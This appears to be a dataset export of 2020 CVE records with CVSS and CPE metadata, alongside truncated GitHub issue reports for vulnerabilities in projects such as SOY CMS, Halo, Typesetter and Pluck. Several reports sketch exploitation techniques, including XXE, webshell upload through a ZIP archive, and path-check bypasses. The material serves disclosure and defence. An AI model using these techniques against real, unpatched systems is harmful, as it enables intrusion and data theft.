https://api.github.com/repos/FasterXML/jackson-databind/issues/2798/comments
2
2020-07-16T17:25:52Z
2021-06-22T04:03:19Z
https://github.com/FasterXML/jackson-databind/issues/2798
658,400,094
2,798
1,430
CVE-2020-25750
2020-09-18T04:15:12.127
An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no long...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/DevGroup-ru/dotplant2/issues/400" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotplant:dotplant2:*:*:*:*:*:*:*:*", "matchCriteriaId": "78887E78-21B0-4AD6-83B6-E600313E263A", "versionEndExcluding": "2020-09-14", "versionEndIncluding": null, "versionStar...
[ "611" ]
611
https://github.com/DevGroup-ru/dotplant2/issues/400
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "DevGroup-ru", "dotplant2" ]
In class Pay2PayPayment(application\components\payment\Pay2PayPayment.php), there is an XXE vulnerability in _checkResult_ function. ```php public function checkResult($hash = '') { if (isset($_POST['xml'], $_POST['sign'])) { $xml = base64_decode(str_replace(' ', '+', $_POST['xml'])); ...
XXE Vulnerability
https://api.github.com/repos/DevGroup-ru/dotplant2/issues/400/comments
1
2020-09-13T13:11:04Z
2020-09-19T08:09:56Z
https://github.com/DevGroup-ru/dotplant2/issues/400
700,567,445
400
1,431
CVE-2020-25756
2020-09-18T05:15:13.197
A buffer overflow vulnerability exists in the mg_get_http_header function in Cesanta Mongoose 6.18 due to a lack of bounds checking. A crafted HTTP header can exploit this bug. NOTE: a committer has stated "this will not happen in practice.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mongoose/issues/1135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mongoose:6.18:*:*:*:*:*:*:*", "matchCriteriaId": "1F4949BC-D04D-4DB8-9E7E-4459648D712E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "120" ]
120
https://github.com/cesanta/mongoose/issues/1135
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mongoose" ]
A buffer overflow error in mg_get_http_header function in mongoose/src/mg_http.c in Mongoose 6.18, where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A Maliciously crafted http header can trigger this bug. To f...
A buffer overflow error in mg_get_http_header
https://api.github.com/repos/cesanta/mongoose/issues/1135/comments
4
2020-08-12T22:11:29Z
2020-09-19T07:43:13Z
https://github.com/cesanta/mongoose/issues/1135
678,010,053
1,135
1,432
CVE-2020-15188
2020-09-18T17:15:12.503
SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/10" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9", "versionEndExcluding": "3.0.2.328", "versionEndIncluding": null, "versionStartEx...
[ "502" ]
502
https://github.com/inunosinsi/soycms/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "inunosinsi", "soycms" ]
## Title Unauthenticated Remote Code Execution (RCE) in SoyCMS ## Summary Severity: Critical SoyCMS 3.0.2 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the website. The vulnerabili...
Unauthenticated Remote Code Execution (RCE) in SoyCMS
https://api.github.com/repos/inunosinsi/soycms/issues/10/comments
1
2020-09-14T12:06:36Z
2020-09-16T06:49:32Z
https://github.com/inunosinsi/soycms/issues/10
701,036,570
10
1,433
CVE-2020-15189
2020-09-18T18:15:16.863
SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure config...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/inunosinsi/soycms/issues/9" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ]...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9", "versionEndExcluding": "3.0.2.328", "versionEndIncluding": null, "versionStartEx...
[ "434" ]
434
https://github.com/inunosinsi/soycms/issues/9
[ "Exploit", "Mitigation", "Third Party Advisory" ]
github.com
[ "inunosinsi", "soycms" ]
## Title Remote Code Execution (RCE) in SoyCMS ## Summary Severity: High SoyCMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was reported earlier can be chained in order to perform a successful remote code execution...
Remote Code Execution (RCE) in SoyCMS
https://api.github.com/repos/inunosinsi/soycms/issues/9/comments
0
2020-09-14T12:05:06Z
2020-09-16T06:57:59Z
https://github.com/inunosinsi/soycms/issues/9
701,035,586
9
1,434
CVE-2020-25790
2020-09-19T21:15:12.140
Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159503/Typesetter-CMS-5.1-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typesettercms:typesetter:*:*:*:*:*:*:*:*", "matchCriteriaId": "37ADABCC-CA0E-4860-8A02-27E51BCE0B19", "versionEndExcluding": null, "versionEndIncluding": "5.1", "versionStart...
[ "434" ]
434
https://github.com/Typesetter/Typesetter/issues/674
[ "Third Party Advisory" ]
github.com
[ "Typesetter", "Typesetter" ]
Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decrea...
Bypass File Uploading restrictions leads to Command Execution
https://api.github.com/repos/Typesetter/Typesetter/issues/674/comments
10
2020-09-18T17:44:24Z
2020-09-19T14:26:52Z
https://github.com/Typesetter/Typesetter/issues/674
704,549,132
674
1,435
CVE-2020-25791
2020-09-19T21:15:12.203
An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/bodil/sized-chunks/issues/11" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://rustsec.org/advisories/RUSTSEC...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sized-chunks_project:sized-chunks:*:*:*:*:*:rust:*:*", "matchCriteriaId": "C880966D-057C-4626-9644-7C386CB9FBBD", "versionEndExcluding": null, "versionEndIncluding": "0.6.2", ...
[ "129" ]
129
https://github.com/bodil/sized-chunks/issues/11
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "bodil", "sized-chunks" ]
Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. # Description Chunk: * Array size is not checked when constructed with `unit()` and `pair()`. * Array size is not checked when constructed with `From<InlineArray<A, T>>`. * ...
Multiple soundness issues in Chunk and InlineArray
https://api.github.com/repos/bodil/sized-chunks/issues/11/comments
5
2020-09-06T22:04:56Z
2021-02-14T12:05:33Z
https://github.com/bodil/sized-chunks/issues/11
694,545,650
11
1,436
CVE-2020-25821
2020-09-23T04:15:11.133
peg-markdown 0.4.14 has a NULL pointer dereference in process_raw_blocks in markdown_lib.c. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jgm/peg-markdown/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peg-markdown_project:peg-markdown:0.4.14:*:*:*:*:*:*:*", "matchCriteriaId": "DA66F7CE-832C-4C4E-9130-D29FCA545582", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "476" ]
476
https://github.com/jgm/peg-markdown/issues/43
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jgm", "peg-markdown" ]
Hi, While fuzzing peg-markdown with Honggfuzz, I found a NULL pointer dereference in the process_raw_blocks() function. Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/jgm/peg-markdown/files/5254664/test01.md.gz) Issue can be reproduced by running: ``` markdown te...
NULL pointer dereference in the process_raw_blocks() function
https://api.github.com/repos/jgm/peg-markdown/issues/43/comments
2
2020-09-21T10:01:11Z
2021-03-27T09:00:24Z
https://github.com/jgm/peg-markdown/issues/43
705,455,420
43
1,437
CVE-2020-24213
2020-09-23T15:15:15.223
An integer overflow was discovered in YGOPro ygocore v13.51. Attackers can use it to leak the game server thread's memory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Fluorohydride/ygopro/issues/2314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Th...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ygopro:ygocore:1.035.1:*:*:*:*:*:*:*", "matchCriteriaId": "DB7E411F-6738-424D-A211-AF076FDD2FFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "190" ]
190
https://github.com/Fluorohydride/ygopro/issues/2314
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Fluorohydride", "ygopro" ]
#### Memory leak This vulnerability happened when the function "SingleDuel::UpdateDeck" and "SingleDuel::PlayerReady" been used. When the player sends a package with error 'mainc' size and 'sidec' size, the function "SingleDuel::UpdateDeck" haven't check those parameters is legal or not. Then this function will cal...
Security Issue: Memory leak.
https://api.github.com/repos/Fluorohydride/ygopro/issues/2314/comments
11
2020-07-31T14:38:56Z
2024-05-31T13:52:07Z
https://github.com/Fluorohydride/ygopro/issues/2314
669,885,569
2,314
1,438
CVE-2020-15930
2020-09-24T19:15:11.713
An XSS issue in Joplin desktop 1.0.190 to 1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159316/Joplin-1.0.245-Cross-Site-Scripting-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "h...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A337333-8FE3-4A1D-8039-A26AC351AA07", "versionEndExcluding": null, "versionEndIncluding": "1.0.245", "versionStar...
[ "79" ]
79
https://github.com/laurent22/joplin/issues/3552
[ "Third Party Advisory" ]
github.com
[ "laurent22", "joplin" ]
I'm opening this issue for future disclosure regarding the vulnerability reported via e-mail.
Security Vulnerability
https://api.github.com/repos/laurent22/joplin/issues/3552/comments
8
2020-07-23T21:23:41Z
2020-09-27T18:25:53Z
https://github.com/laurent22/joplin/issues/3552
664,774,612
3,552
1,439
CVE-2016-11086
2020-09-24T20:15:12.257
lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does not verify server X.509 certificates if a certificate bundle cannot be found, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauth-xx/oauth-ruby/issues/137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oauth-ruby_project:oauth-ruby:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "2F962A48-C937-46DB-A97B-C1D71BC8C3DA", "versionEndExcluding": null, "versionEndIncluding": "0.5.4", "ve...
[ "295" ]
295
https://github.com/oauth-xx/oauth-ruby/issues/137
[ "Exploit", "Third Party Advisory" ]
github.com
[ "oauth-xx", "oauth-ruby" ]
While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. `OpenSSL::SS...
Certificate and chain not validated if certificate bundle cannot be found
https://api.github.com/repos/oauth-xx/oauth-ruby/issues/137/comments
4
2016-12-01T21:59:30Z
2021-10-31T22:28:41Z
https://github.com/oauth-xx/oauth-ruby/issues/137
192,974,378
137
1,440
CVE-2019-20921
2020-09-30T18:15:18.007
bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/snapappointments/bootstrap-select/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:snapappointments:bootstrap-select:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "72F562DB-EA28-45BF-BFBA-FFC00C570092", "versionEndExcluding": "1.13.6", "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/snapappointments/bootstrap-select/issues/2199
[ "Patch", "Third Party Advisory" ]
github.com
[ "snapappointments", "bootstrap-select" ]
The bootstrap-select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped. Sample can be seen here: https://jsfiddle.net/b1dhf8ec/2/
Escaped tags parsed as non-escaped in title and data-content
https://api.github.com/repos/snapappointments/bootstrap-select/issues/2199/comments
7
2019-02-14T11:10:30Z
2020-10-01T03:02:55Z
https://github.com/snapappointments/bootstrap-select/issues/2199
410,247,803
2,199
1,441
CVE-2020-21244
2020-09-30T18:15:23.817
An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty folder via admin/inst_lang.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE"...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FrontAccountingERP/FA/issues/40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:frontaccounting:frontaccounting:2.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "525A049E-5790-4686-AAB0-580648615E28", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "22" ]
22
https://github.com/FrontAccountingERP/FA/issues/40
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FrontAccountingERP", "FA" ]
### test version:2.4.7 ### 0x00 description Frontaccounting is using the function clean_file_name() to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability. ![2019-11-12_103343](https://user-images.githubusercontent.com/33822448/68640026-74465180-0541-11ea-9472-55c45...
A Directory Traversal vulnerability
https://api.github.com/repos/FrontAccountingERP/FA/issues/40/comments
3
2019-11-12T03:59:14Z
2022-11-24T03:32:50Z
https://github.com/FrontAccountingERP/FA/issues/40
521,314,213
40
1,442
CVE-2020-21522
2020-09-30T18:15:23.880
An issue was discovered in halo V1.1.3. A Zip Slip Directory Traversal Vulnerability in the backend,the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "22" ]
22
https://github.com/halo-dev/halo/issues/418
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4....
A Zip Slip Directory Traversal Vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/418/comments
0
2019-12-11T10:35:33Z
2019-12-12T16:19:06Z
https://github.com/halo-dev/halo/issues/418
536,283,129
418
1,443
CVE-2020-21524
2020-09-30T18:15:24.023
There is a XML external entity (XXE) vulnerability in halo v1.1.3, The function of importing other blogs in the background(/api/admin/migrations/wordpress) needs to parse the xml file, but it is not used for security defense, This vulnerability can detect the intranet, read files, enable ddos attacks, etc. exp:https://...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:-:*:*:*:*:*:*", "matchCriteriaId": "1CB4664A-F423-4172-B79D-C082E4DDBC76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "611" ]
611
https://github.com/halo-dev/halo/issues/423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4....
A XML external entity (XXE) vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/423/comments
1
2019-12-11T11:44:59Z
2019-12-12T17:08:25Z
https://github.com/halo-dev/halo/issues/423
536,318,212
423
1,444
CVE-2020-21525
2020-09-30T18:15:24.083
Halo V1.1.3 is affected by: Arbitrary File reading. In an interface that reads files in halo v1.1.3, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/420" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "22" ]
22
https://github.com/halo-dev/halo/issues/420
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%...
An Arbitrary File reading vulnerability in the backend(bypass the Path check)
https://api.github.com/repos/halo-dev/halo/issues/420/comments
1
2019-12-11T10:52:58Z
2019-12-12T17:13:17Z
https://github.com/halo-dev/halo/issues/420
536,292,011
420
1,445
CVE-2020-21526
2020-09-30T18:15:24.163
An Arbitrary file writing vulnerability in halo v1.1.3. In an interface to write files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/421" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "22" ]
22
https://github.com/halo-dev/halo/issues/421
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%...
An Arbitrary file writing vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/421/comments
0
2019-12-11T11:00:30Z
2019-12-12T16:21:37Z
https://github.com/halo-dev/halo/issues/421
536,295,949
421
1,446
CVE-2020-21527
2020-09-30T18:15:24.227
There is an Arbitrary file deletion vulnerability in halo v1.1.3. A backup function in the background allows a user, when deleting their backup files, to delete any files on the system through directory traversal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "NONE",...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "22" ]
22
https://github.com/halo-dev/halo/issues/422
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **I am sure I have checked** - [x] [Halo User Guide Documentation ](https://halo.run/docs) - [x] [Halo BBS](https://bbs.halo.run) - [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%...
An Arbitrary file deletion vulnerability in the backend
https://api.github.com/repos/halo-dev/halo/issues/422/comments
0
2019-12-11T11:06:14Z
2019-12-12T16:32:49Z
https://github.com/halo-dev/halo/issues/422
536,298,956
422
1,447
CVE-2020-21564
2020-09-30T18:15:24.303
An issue was discovered in Pluck CMS 4.7.10-dev2 and 4.7.11. There is a file upload vulnerability that can cause a remote command execution via admin.php?action=files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/83" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/83
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Vulnerability location: /data/inc/file.php line:42 ![image](https://user-images.githubusercontent.com/55877767/67195146-04a1e280-f42b-11e9-9b70-023bde63d1a7.png) If the file name is '.htaccess', the strpos function returns a result of 0. Demo: Upload these two files in the management file interface. ![image](http...
